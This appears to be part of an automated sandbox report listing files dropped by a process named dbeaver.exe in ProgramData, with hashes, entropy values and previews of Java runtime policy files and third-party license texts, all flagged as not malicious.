      Preview://.// This system policy file grants a set of default permissions to all domains.// and can be configured to grant additional permissions to modules and other.// code sources. The code source URL scheme for modules linked into a.// run-time image is "jrt"..//.// For example, to grant permission to read the "foo" property to the module.// "com.greetings", the grant entry is:.//.// grant codeBase "jrt:/com.greetings" {.// permission java.util.PropertyPermission "foo", "read";.// };.//..// default permissions granted to all domains.grant {. // allows anyone to listen on dynamic ports. permission java.net.SocketPermission "localhost:0", "listen";.. // "standard" properies that can be read by anyone. permission java.util.PropertyPermission "java.version", "read";. permission java.util.PropertyPermission "java.vendor", "read";. permission java.util.PropertyPermission "java.vendor.url", "read";. permission java.util.PropertyPermission "java.class.version", "read";.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):58387
      Entropy (8bit):4.930251710432107
      Encrypted:false
      SSDEEP:
      MD5:7C1D9B3BA95757CA975A2A2A81B0E31F
      SHA1:B19B5810C58D9311DD7CDFE7B1F891FE126F2A2D
      SHA-256:B2B11518A57BE2FF8B677B22F151247802AFB382A2ADB258A7A94A2FE1C8F768
      SHA-512:0AF4D8A9D43DB7307B752B236FC6F94BFE5647CCB7BEE37AB688F578A8882C261731E8B54A17CD5A8DA20953D960DBB70C64050290FE15614124CBBE52E2D684
      Malicious:false
      Reputation:unknown
      Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2390
      Entropy (8bit):4.7611843972228405
      Encrypted:false
      SSDEEP:
      MD5:3D47D94BC4F19D18BCC8B23F51D013AF
      SHA1:A97CD312D6A2A9C8C780C15E5AF51A2F4F97C2CB
      SHA-256:6DA0747334B0FEA7592FD92614B2BBC8B126535E129B1FEE483774D914E98EB5
      SHA-512:68A031264CF9442526307364CA74B336AF55564C233C2F514CAC48E910022767562F8FF6A64BB9CFCBF0FB5E755289273382C9246418A4B9207FC7761D03C64E
      Malicious:false
      Reputation:unknown
      Preview:. Java(TM) Cryptography Extension Policy Files. for the Java(TM) Platform, Standard Edition Runtime Environment.. README.------------------------------------------------------------------------..Import and export control rules on cryptographic software vary from.country to country. The Java Cryptography Extension (JCE) architecture.allows flexible cryptographic key strength to be configured via the.jurisdiction policy files which are referenced by the "crypto.policy".security property in the <java-home>/conf/security/java.security file...By default, Java provides two different sets of cryptographic policy.files:.. unlimited: These policy files contain no restrictions on cryptographic. strengths or algorithms.. limited: These policy files contain more restricted cryptographic. strengths..These files reside in <java-home>/conf/security/policy in the "unlimited".or "limited" subdirectories respectively...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):146
      Entropy (8bit):4.527560331114326
      Encrypted:false
      SSDEEP:
      MD5:1A08FFDF0BC871296C8D698FB22F542A
      SHA1:F3F974D3F6245C50804DCC47173AA29D4D7F0E2C
      SHA-256:758B930A526FC670AB7537F8C26321527050A31F5F42149A2DDA623C56A0A1A9
      SHA-512:4CFCA5B10CD7ADDCFF887C8F3621D2FBEC1B5632436326377B0CE5AF1AE3E8B68AC5A743CA6082FC79991B8EEC703A6E1DFD5B896153407AD72327753222FDB3
      Malicious:false
      Reputation:unknown
      Preview:// Default US Export policy file...grant {. // There is no restriction to any algorithms.. permission javax.crypto.CryptoAllPermission; .};.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):647
      Entropy (8bit):4.651231515753206
      Encrypted:false
      SSDEEP:
      MD5:6D7B4616A5DBA477B6B6D3F9A12E568F
      SHA1:7FB67E217C53A685CB9314001592B5BD50B5FBB9
      SHA-256:2B2627548E61316150D47FFC3E6CAD465CA05B3CCCD4785EB7D21AA7BAA0F441
      SHA-512:A0B98CBBB49184DF973BB2C4A506E9BC6E025A696BC0C8054A6352CC3F9B4A38E3BAF117C6834DDADDC38498556607ED4EDA8F1BC683F662D61DA50E0DB0C8C2
      Malicious:false
      Reputation:unknown
      Preview:// Some countries have import limits on crypto strength. This policy file.// is worldwide importable...grant {. permission javax.crypto.CryptoPermission "DES", 64;. permission javax.crypto.CryptoPermission "DESede", *;. permission javax.crypto.CryptoPermission "RC2", 128, . "javax.crypto.spec.RC2ParameterSpec", 128;. permission javax.crypto.CryptoPermission "RC4", 128;. permission javax.crypto.CryptoPermission "RC5", 128, . "javax.crypto.spec.RC5ParameterSpec", *, 12, *;. permission javax.crypto.CryptoPermission "RSA", *;. permission javax.crypto.CryptoPermission *, 128;.};.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):566
      Entropy (8bit):4.521178196551511
      Encrypted:false
      SSDEEP:
      MD5:4CBB03F484C86CBEA1A217BAAE07D3C9
      SHA1:EE67275BC119C98191A09FF72F043872B05AB7FD
      SHA-256:8C3D7648ABCD95A272CE12DB870082937F4D7F6878D730D83CB7FBB31EB8B2C9
      SHA-512:2BD70518AED6B0E01C520C446830C5F567FA72974548818CAC3E1E5C2BE6F03DB78CE6012F5463B1E19C36243D04CBAAD38EC79524635EAAE2E427EB1875CCDB
      Malicious:false
      Reputation:unknown
      Preview:// Some countries have import limits on crypto strength, but may allow for.// these exemptions if the exemption mechanism is used...grant {. // There is no restriction to any algorithms if KeyRecovery is enforced.. permission javax.crypto.CryptoPermission *, "KeyRecovery"; .. // There is no restriction to any algorithms if KeyEscrow is enforced.. permission javax.crypto.CryptoPermission *, "KeyEscrow"; .. // There is no restriction to any algorithms if KeyWeakening is enforced. . permission javax.crypto.CryptoPermission *, "KeyWeakening";.};.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):193
      Entropy (8bit):4.403143222843641
      Encrypted:false
      SSDEEP:
      MD5:2A0F330C51AFF13A96AF8BD5082C84A8
      SHA1:AD2509631ED743C882999AC1200FD5FB8A593639
      SHA-256:8D8A318E6D90DFD7E26612D2B6385AA704F686CA6134C551F8928418D92B851A
      SHA-512:2B0385417A3FC2AF58B1CBB186DD3E0B0875E42923884153DEEE0EFCB390CA00B326ED5B266B3892D31BF7D40E10969A0B51DAA6D0B4CA3183770786925D3CDE
      Malicious:false
      Reputation:unknown
      Preview:// Country-specific policy file for countries with no limits on crypto strength...grant {. // There is no restriction to any algorithms.. permission javax.crypto.CryptoAllPermission; .};.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1210
      Entropy (8bit):4.681309933800066
      Encrypted:false
      SSDEEP:
      MD5:4F95242740BFB7B133B879597947A41E
      SHA1:9AFCEB218059D981D0FA9F07AAD3C5097CF41B0C
      SHA-256:299C2360B6155EB28990EC49CD21753F97E43442FE8FAB03E04F3E213DF43A66
      SHA-512:99FDD75B8CE71622F85F957AE52B85E6646763F7864B670E993DF0C2C77363EF9CFCE2727BADEE03503CDA41ABE6EB8A278142766BF66F00B4EB39D0D4FC4A87
      Malicious:false
      Reputation:unknown
      Preview:############################################################.# Sound Configuration File.############################################################.#.# This properties file is used to specify default service.# providers for javax.sound.midi.MidiSystem and.# javax.sound.sampled.AudioSystem..#.# The following keys are recognized by MidiSystem methods:.#.# javax.sound.midi.Receiver.# javax.sound.midi.Sequencer.# javax.sound.midi.Synthesizer.# javax.sound.midi.Transmitter.#.# The following keys are recognized by AudioSystem methods:.#.# javax.sound.sampled.Clip.# javax.sound.sampled.Port.# javax.sound.sampled.SourceDataLine.# javax.sound.sampled.TargetDataLine.#.# The values specify the full class name of the service.# provider, or the device name..#.# See the class descriptions for details..#.# Example 1:.# Use MyDeviceProvider as default for SourceDataLines:.# javax.sound.sampled.SourceDataLine=com.xyz.MyDeviceProvider.#.# Example 2:.# Specify the default Synthesizer by it
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2114
      Entropy (8bit):4.530565844905079
      Encrypted:false
      SSDEEP:
      MD5:71BB3AD0017BF36D14BB96A8D4B32C45
      SHA1:1A5C553E71BDB7D94995B206BC9EAA49ABD1E888
      SHA-256:A69BCE275BA7A3570AF6579CB0F55682CD75FEDFCD49E0E8E9022270C447C916
      SHA-512:9F658DFEA71BDC3CC1549EDFB5AD3171DBFA0082B2D91E820C09ABE0B376B6BCD8B5170442A5E25E72274E98F130176BBDECFA7997C59705782B214F02136A20
      Malicious:false
      Reputation:unknown
      Preview: ADDITIONAL INFORMATION ABOUT LICENSING..Certain files distributed by Oracle America, Inc. and/or its affiliates are .subject to the following clarification and special exception to the GPLv2, .based on the GNU Project exception for its Classpath libraries, known as the .GNU Classpath Exception...Note that Oracle includes multiple, independent programs in this software .package. Some of those programs are provided under licenses deemed .incompatible with the GPLv2 by the Free Software Foundation and others. .For example, the package includes programs licensed under the Apache .License, Version 2.0 and may include FreeType. Such programs are licensed .to you under their original licenses. ..Oracle facilitates your further distribution of this package by adding the .Classpath Exception to the necessary parts of its GPLv2 code, which permits .you to use that code in combination with other independent modules not .licensed under the GPLv2. However, note that this woul
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1522
      Entropy (8bit):4.747042537008044
      Encrypted:false
      SSDEEP:
      MD5:D94F7C92FF61C5D3F8E9433F76E39F74
      SHA1:7A9B074CA8D783DBE5310ECC22F5538B65CC918E
      SHA-256:A44EB7B5CAF5534C6EF536B21EDB40B4D6BABF91BF97D9D45596868618B2C6FB
      SHA-512:D4044F6CEB094753075036920C0669631F4D3C13203CAF2BEA345E2CC4094905719732010BBE1CAE97BC78743AA6DEF7C2AA33F3E8FCA9971F2CA0457837D3B0
      Malicious:false
      Reputation:unknown
      Preview:.OPENJDK ASSEMBLY EXCEPTION..The OpenJDK source code made available by Oracle America, Inc. (Oracle) at.openjdk.java.net ("OpenJDK Code") is distributed under the terms of the GNU.General Public License <http://www.gnu.org/copyleft/gpl.html> version 2.only ("GPL2"), with the following clarification and special exception... Linking this OpenJDK Code statically or dynamically with other code. is making a combined work based on this library. Thus, the terms. and conditions of GPL2 cover the whole combination... As a special exception, Oracle gives you permission to link this. OpenJDK Code with certain code licensed by Oracle as indicated at. http://openjdk.java.net/legal/exception-modules-2007-05-08.html. ("Designated Exception Modules") to produce an executable,. regardless of the license terms of the Designated Exception Modules,. and to copy and distribute the resulting executable under GPL2,. provided that the Designated Exception Modules continue to be.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):19274
      Entropy (8bit):4.667864876938965
      Encrypted:false
      SSDEEP:
      MD5:3E0B59F8FAC05C3C03D4A26BBDA13F8F
      SHA1:A4FB972C240D89131EE9E16B845CD302E0ECB05F
      SHA-256:4B9ABEBC4338048A7C2DC184E9F800DEB349366BDF28EB23C2677A77B4C87726
      SHA-512:6732288C682A39ED9EDF11A151F6F48E742696F4A762C0C7D8872B99B9F6D5AB6C305064D4910B1A254862A873129F11FD0FA56FF11BC577D29303F4FB492673
      Malicious:false
      Reputation:unknown
      Preview:The GNU General Public License (GPL)..Version 2, June 1991..Copyright (C) 1989, 1991 Free Software Foundation, Inc..51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA..Everyone is permitted to copy and distribute verbatim copies of this license.document, but changing it is not allowed...Preamble..The licenses for most software are designed to take away your freedom to share.and change it. By contrast, the GNU General Public License is intended to.guarantee your freedom to share and change free software--to make sure the.software is free for all its users. This General Public License applies to.most of the Free Software Foundation's software and to any other program whose.authors commit to using it. (Some other Free Software Foundation software is.covered by the GNU Library General Public License instead.) You can apply it to.your programs, too...When we speak of free software, we are referring to freedom, not price. Our.General Public Licenses are designed to make sure that
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1444
      Entropy (8bit):5.194600884456683
      Encrypted:false
      SSDEEP:
      MD5:2E33468A535A4EB09EF57FC12A2652D0
      SHA1:E64516F3FA1E72F88CAA50F14B8046DD74D012B6
      SHA-256:45C6D4DA48325EDFBFF3DCF71C704E504C057904435ED23C6D57046D551EB69D
      SHA-512:4D14B5DDBB4D09797264ED29BA71FAB6986B4A9E75EFB9402C1476E0A9E2884813D6A922DEA125643B4F74E1F3E458F4E48D6C840E0F4D16ED72FFBC4611DBB2
      Malicious:false
      Reputation:unknown
      Preview:## Cryptix AES v3.2.0..### Cryptix General License.<pre>..Cryptix General License..Copyright (c) 1995-2005 The Cryptix Foundation Limited..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. 1. Redistributions of source code must retain the copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in. the documentation and/or other materials provided with the. distribution...THIS SOFTWARE IS PROVIDED BY THE CRYPTIX FOUNDATION LIMITED AND.CONTRIBUTORS ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,.INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED..IN NO EVENT SHALL THE CRYPTIX FOUNDATION LIMITED OR CONTRIBUTORS BE.LIABLE FOR ANY DIRECT
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):1584
      Entropy (8bit):5.200960306339295
      Encrypted:false
      SSDEEP:
      MD5:66C0CECD7AADDF8F7D0CDB433C5C6036
      SHA1:C34EB481A27B11495D8E0A5505BE89826B8051E2
      SHA-256:1FF912740E84E024711DEF5FA482FFBB46EFF64559760C467352DFA7C39A3307
      SHA-512:7ECBF4EF5B621227CAA6889937E980CD3492E344B2EA06D0B8F6F247EB484420625EEBED3AD5F23F84251B47390CB115F41197909593D3CA7D293415AC9188C1
      Malicious:false
      Reputation:unknown
      Preview:## ASM Bytecode Manipulation Framework v8.0.1..### ASM License.<pre>..Copyright (c) 2000-2011 France T.l.com.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions.are met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holders nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS".AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE.IMPLIED WARRANTIES OF MERCHAN
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1556
      Entropy (8bit):5.222803386080423
      Encrypted:false
      SSDEEP:
      MD5:2E89A282A50F8702E52703464E6937CA
      SHA1:CFC22A6F5B17CD539234D5B3160A5224ABEFADB9
      SHA-256:BEF40679922D6FDFB7E4DDB223AD6722300F6054BA737BBF6188D60FCEC517F9
      SHA-512:AE459D8CE5581EA57E203088373C1CE86D122D0E27EB871EE1383E0E64CD8A184FA207EEE0E835347316E70AFA24A1C95AEC30DEF3E09D15EE19A0B2C3AD2095
      Malicious:false
      Reputation:unknown
      Preview:## c-libutl 20160225..### c-libutl License.```..This software is distributed under the terms of the BSD license...== BSD LICENSE ===============================================================.. (C) 2009 by Remo Dentato (rdentato@gmail.com)...Redistribution and use in source and binary forms, with or without modification,.are permitted provided that the following conditions are met:.. * Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer.. * Redistributions in binary form must reproduce the above copyright notice,. this list of conditions and the following disclaimer in the documentation. and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text, with very long lines (837)
      Category:dropped
      Size (bytes):9130
      Entropy (8bit):5.032821254249109
      Encrypted:false
      SSDEEP:
      MD5:8F5780E8D582FE686ED11535DEC512ED
      SHA1:B63B615A826D8A40F5A45DC49DA0FF1D8B6666C1
      SHA-256:F2BD33DED550A05D59E8F659416EF382490504548D846E6388B1DFFD273AA077
      SHA-512:49996CDCD2BFBF0E018E0FE127A98E5435E50C0B3F4891404E897826BE74AD56D253BFEB51934195ED559BE3C251613ECAE744C39FD6793F59DBC87DE6E970E5
      Malicious:false
      Reputation:unknown
      Preview:## Unicode Common Local Data Repository (CLDR) v39..### CLDR License..```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE..See Terms of Use for definitions of Unicode Inc.'s.Data Files and Software...NOTICE TO USER: Carefully read the following legal agreement..BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S.DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),.YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE.TERMS AND CONDITIONS OF THIS AGREEMENT..IF YOU DO NOT AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE.THE DATA FILES OR SOFTWARE...COPYRIGHT AND PERMISSION NOTICE..Copyright . 1991-2021 Unicode, Inc. All rights reserved..Distributed under the Terms of Use in https://www.unicode.org/copyright.html...Permission is hereby granted, free of charge, to any person obtaining.a copy of the Unicode data files and any associated documentation.(the "Data Files") or Unicode software and any associated documentation.(the "Software") to
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text, with very long lines (849)
      Category:dropped
      Size (bytes):11086
      Entropy (8bit):4.982322403001006
      Encrypted:false
      SSDEEP:
      MD5:2F77C0CAE3FDC2B5B6E8D85898CC4C2F
      SHA1:92DB4D2A0CDC8680910FC434A1A637A5B87ED599
      SHA-256:AF0057E8553906083F69C2FB9FE9ED4AE8BC2340A0B1E376A424702F00300B29
      SHA-512:2A105217C50F345C1FBA6DEC9FF8A3C70EC0C14F4821C1175C2C21D4E6B5F4F1E7A49D29AAE9698C4850A2298802EB926EB6D80CD6082EEAA623394B10F28967
      Malicious:false
      Reputation:unknown
      Preview:## International Components for Unicode (ICU4J) v67.1..### ICU4J License.```..COPYRIGHT AND PERMISSION NOTICE (ICU 58 and later)..Copyright . 1991-2020 Unicode, Inc. All rights reserved..Distributed under the Terms of Use in https://www.unicode.org/copyright.html...Permission is hereby granted, free of charge, to any person obtaining.a copy of the Unicode data files and any associated documentation.(the "Data Files") or Unicode software and any associated documentation.(the "Software") to deal in the Data Files or Software.without restriction, including without limitation the rights to use,.copy, modify, merge, publish, distribute, and/or sell copies of.the Data Files or Software, and to permit persons to whom the Data Files.or Software are furnished to do so, provided that either.(a) this copyright and permission notice appear with all copies.of the Data Files or Software, or.(b) this copyright and permission notice appear in associated.Documentation...THE DATA FILES AND SOFTWARE ARE
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):17785
      Entropy (8bit):4.591906517978096
      Encrypted:false
      SSDEEP:
      MD5:A90527D48AD0216FD1E5241015BB0F77
      SHA1:A59B3BF9478184BE7AE959E27CE7257BC418985A
      SHA-256:BCA182053946267C1F3BB5D160849A6A290B2AEFC57ABC7155180CA98DB87301
      SHA-512:6FE7F9980D1E29A0AB7CCCF8ACB1B73C867E48A975799F57E07381A432B5EAD70B2F470649AA36E38B6BFBF3E819FA2D2B9C4E3281C86ECF500549B1B4800038
      Malicious:false
      Reputation:unknown
      Preview:## Mozilla Public Suffix List..### Public Suffix Notice.```.You are receiving a copy of the Mozilla Public Suffix List in the following.file: <java-home>/lib/security/public_suffix_list.dat. The terms of the.Oracle license do NOT apply to this file; it is licensed under the.Mozilla Public License 2.0, separately from the Oracle programs you receive..If you do not wish to use the Public Suffix List, you may remove the.<java-home>/lib/security/public_suffix_list.dat file...The Source Code of this file is available under the.Mozilla Public License, v. 2.0 and is located at.https://raw.githubusercontent.com/publicsuffix/list/3c213aab32b3c014f171b1673d4ce9b5cd72bf1c/public_suffix_list.dat..If a copy of the MPL was not distributed with this file, you can obtain one.at https://mozilla.org/MPL/2.0/...Software distributed under the License is distributed on an "AS IS" basis,.WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License.for the specific language governing rights and l
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):2384
      Entropy (8bit):5.168907700608063
      Encrypted:false
      SSDEEP:
      MD5:A37C772AAEB922A5FF741A1DA81D52AC
      SHA1:85C21732F4903895DAE6E512D23ACCC5D26010DF
      SHA-256:5E4E6623A21A63F9BC16EA54AF4133B8038E490C0D499A74676F9E5A61B9C5B2
      SHA-512:17805F146FAE2058FF99D051D231BFC7238C2B79DC70930AF01F3C56657E06D037664CD9DBDC42FE48C3539DCF39F4B799E0A53D08A8891BA2AF484745B956AA
      Malicious:false
      Reputation:unknown
      Preview:## The Unicode Standard, Unicode Character Database, Version 13.0.0. .### Unicode Character Database.```..UNICODE, INC. LICENSE AGREEMENT - DATA FILES AND SOFTWARE..See Terms of Use for definitions of Unicode Inc.'s.Data Files and Software...NOTICE TO USER: Carefully read the following legal agreement..BY DOWNLOADING, INSTALLING, COPYING OR OTHERWISE USING UNICODE INC.'S.DATA FILES ("DATA FILES"), AND/OR SOFTWARE ("SOFTWARE"),.YOU UNEQUIVOCALLY ACCEPT, AND AGREE TO BE BOUND BY, ALL OF THE.TERMS AND CONDITIONS OF THIS AGREEMENT..IF YOU DO NOT AGREE, DO NOT DOWNLOAD, INSTALL, COPY, DISTRIBUTE OR USE.THE DATA FILES OR SOFTWARE...COPYRIGHT AND PERMISSION NOTICE..Copyright . 1991-2020 Unicode, Inc. All rights reserved..Distributed under the Terms of Use in https://www.unicode.org/copyright.html...Permission is hereby granted, free of charge, to any person obtaining.a copy of the Unicode data files and any associated documentation.(the "Data Files") or Unicode software and any associated do
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1454
      Entropy (8bit):5.23517420325372
      Encrypted:false
      SSDEEP:
      MD5:CEF1D92FF8ACE278BD32AC5E18735B86
      SHA1:6C7D15E2B8F3E99527458C8EA33420EE1D34AF7B
      SHA-256:3AC2992770080453B98C42AFA807BA4B2C1738EF756B92A55C645F55E7DF48F0
      SHA-512:12AA61AE93FC626A230F39F44CA11C75086FD9BB50F2794FB9FEC29B9BEF924545FC19D9CB38FDA631560CA78AE8E587144CF3CF3C83A6B336BB4711611393BF
      Malicious:false
      Reputation:unknown
      Preview:## Bert Belder: wepoll v 1.5.8..### wepoll License.```.wepoll - epoll for Windows.https://github.com/piscisaureus/wepoll..Copyright 2012-2020, Bert Belder <bertbelder@gmail.com>.All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:.. * Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer... * Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT.OWNER OR CONTRIBUTORS BE LIABLE F
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1011
      Entropy (8bit):4.589717550699574
      Encrypted:false
      SSDEEP:
      MD5:19F03867B2027801B674A81134FC94BD
      SHA1:C239D2DA15DAC52B8B928C712BBB29A0BC18AAE4
      SHA-256:19ABD401BAC9AF9B3E34C07E226DE1E6F2C1F0806FFCDC3FE2F1AD5855A42FF8
      SHA-512:E37AA89A4F46987A6BC1B2B5FAD4CBF8DAA1F27CA30C02BB0405512BC9DE9C76B8655222B35DDB1C6AAE89234EDBB59B7D8B0989505CB72D216FD3D44DB76824
      Malicious:false
      Reputation:unknown
      Preview:## zlib v1.2.11..### zlib License.<pre>..Copyright (C) 1995-2017 Jean-loup Gailly and Mark Adler..This software is provided 'as-is', without any express or implied.warranty. In no event will the authors be held liable for any damages.arising from the use of this software...Permission is granted to anyone to use this software for any purpose,.including commercial applications, and to alter it and redistribute it.freely, subject to the following restrictions:..1. The origin of this software must not be misrepresented; you must not. claim that you wrote the original software. If you use this software. in a product, an acknowledgment in the product documentation would be. appreciated but is not required..2. Altered source versions must be plainly marked as such, and must not be. misrepresented as being the original software..3. This notice may not be removed or altered from any source distribution...Jean-loup Gailly Mark Adler.jloup@gzip.org madler@alumni.caltech.e
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):33
      Entropy (8bit):3.9801694078807643
      Encrypted:false
      SSDEEP:
      MD5:16989BAB922811E28B64AC30449A5D05
      SHA1:51AB20E8C19EE570BF6C496EC7346B7CF17BD04A
      SHA-256:86E0516B888276A492B19F9A84F5A866ED36925FAE1510B3A94A0B6213E69192
      SHA-512:86571F127A6755A7339A9ED06E458C8DC5898E528DE89E369A13C183711831AF0646474986BAE6573BC5155058D5F38348D6BFDEB3FD9318E98E0BF7916E6608
      Malicious:false
      Reputation:unknown
      Preview:Please see ..\java.base\LICENSE..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):167
      Entropy (8bit):4.67070372864436
      Encrypted:false
      SSDEEP:
      MD5:0889FD01A6802A5A934572D9BD47F430
      SHA1:7A7E547452EE1C72E8B0D96DCCBE315F62D5B564
      SHA-256:04D61E3E8E71DD452EBE52008AF5378D9F6640D14578AEB515DC5375973B0189
      SHA-512:F5872960470810CDBDC2DB1DFB216CAB88203B23400B16E157C8654C2EECFF8D9B26CE066EC18718C8E6D54EE1C54533FDADE395C454210FED5159FD4A7A0ADB
      Malicious:false
      Reputation:unknown
      Preview:## Eastman Kodak Company: Portions of color management and imaging software..### Eastman Kodak Notice.<pre>.Portions Copyright Eastman Kodak Company 1991-2003.</pre>..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):30389
      Entropy (8bit):4.805494922736416
      Encrypted:false
      SSDEEP:
      MD5:F73E7C9F7921E48924E4EFC7C18272E4
      SHA1:AE9D107DB00CA6BF72140E4C82C0442CCC25FAD5
      SHA-256:200BB5ABE514B22A08D1834C6A6E38A471BF0AE635D9A41B523381994AB0F938
      SHA-512:64F73C9E5AD2DF74B2C41847DFA1F6EB7B923B662CD7C1EC14A9F9712BE6DF94F7E1495C59A4C5D3505A5528EA5A32D77BE8EB81596803C22FACE80A435F688A
      Malicious:false
      Reputation:unknown
      Preview:## The FreeType Project: Freetype v2.12.1...### FreeType Notice..```.FreeType comes with two licenses from which you can choose the one.which fits your needs best... The FreeType License (FTL) is the most commonly used one. It is. a BSD-style license with a credit clause and thus compatible with. the GNU Public License (GPL) version 3, but not with the. GPL version 2... The GNU General Public License (GPL), version 2. Use it for all. projects which use the GPLv2 also, or which need a license. compatible to the GPLv2...```..### FreeType License.```..Copyright (C) 1996-2022 by David Turner, Robert Wilhelm, and Werner Lemberg..Copyright (C) 2007-2022 by Dereg Clegg and Michael Toftdal..Copyright (C) 1996-2022 by Just van Rossum, David Turner, Robert Wilhelm, and Werner Lemberg..Copyright (C) 2004-2022 by Masatake YAMATO and Redhat K.K..Copyright (C) 2007-2022 by Derek Clegg and Michael Toftdal..Copyright (C) 2007-2022 by David Turner..Copyright (C) 2022 by David Turne
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1288
      Entropy (8bit):5.243726093802808
      Encrypted:false
      SSDEEP:
      MD5:867001E2A577F88CFC856F45959502AA
      SHA1:109C11CEC13349212BA94B9F3EB7D0943229938E
      SHA-256:C8B99F33890887D27AD56FBA9EDD8EBBC668CFE0689168505A95613D1D4B32F8
      SHA-512:DAFAC31D75A7AB4DDD7666799A24ABF22C1583CA22554A738CC26A77BF927B20DDE52F12194670A5196BCE3A43BD58DE46944291727C8877FEE1FE4A38A1F1CA
      Malicious:false
      Reputation:unknown
